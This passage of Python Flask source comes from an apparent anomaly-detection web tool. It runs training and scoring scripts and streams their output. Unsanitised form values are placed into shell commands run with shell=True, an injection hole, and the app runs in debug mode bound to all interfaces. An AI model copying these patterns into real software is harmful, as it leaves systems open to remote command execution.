409 |                     setTimeout(function(){
410 |                         window.location.href = 'http://127.0.0.1:5601';
411 |                     }, 30000);
412 |                         </script>"""
413 |                     yield full_text
414 | 
415 |                     break
416 | 
417 |         #
418 |         return Response(inner(), mimetype='text/html')
419 | 
420 | 
421 | @app.route('/osas/run_full_process', methods=['GET', 'POST'])
422 | def run_full_process():
423 |     print(request.method)
424 |     if request.method == 'GET':
425 |         onlyfiles = [f for f in listdir(data_path) if
426 |                      isfile(join(data_path, f)) and '.conf' not in f and '.model' not in f]
427 |         files = onlyfiles
428 | 
429 |         return render_template("run_full_process.html", files=files, len=len(files))
430 | 
431 |     if request.method == 'POST':
432 |         input = request.form['input']
433 |         output = request.form['output']
434 |         print(input)
435 |         print(output)
436 |         if '.csv' not in output:
437 |             output += '.csv'
438 | 
439 |         def inner():
440 |             import datetime
441 |             stamp = str(datetime.datetime.now())[0:19].replace(' ', '_').replace(':', '_')
442 |             key = input.split('.')[0] + "_" + stamp
443 |             commands = []
444 |             commands.append(
445 |                 'python3 osas/main/autoconfig.py --input-file={} --output-file={}.conf 2>&1'.format(data_path + input,
446 |                                                                                                  data_path + key))
447 |             commands.append(
448 |                 'python3 osas/main/train_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model 2>&1'.format(
449 |                     data_path + input, data_path + key, data_path + key))
450 |             commands.append(
451 |                 'python3 osas/main/run_pipeline.py --input-file={} --conf-file={}.conf --model-file={}.model --output-file={} 2>&1'.format(
452 |                     data_path + input, data_path + key, data_path + key, data_path + output))
453 | 
454 |             for command in commands:
455 |                 yield command + '<br/>\n' + '<br/>\n'
456 |                 proc = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE)
457 | 
458 |                 for line in iter(proc.stdout.readline, ''):
459 | 
460 |                     try:
461 |                         yield line.rstrip().decode('ascii') + '<br/>\n'
462 |                     except:
463 |                         a = None
464 |                     poll = proc.poll()
465 |                     if poll is not None:
466 |                         yield 'DONE!<br/>\n'
467 |                         yield 'NEXT:<br/>\n'
468 |                         break
469 |             yield 'go to kibana http://127.0.0.1:5601'
470 | 
471 |         #
472 |         return Response(inner(), mimetype='text/html')
473 | 
474 | 
475 | app.run(port=8888, host='0.0.0.0', debug=True)
476 | 


--------------------------------------------------------------------------------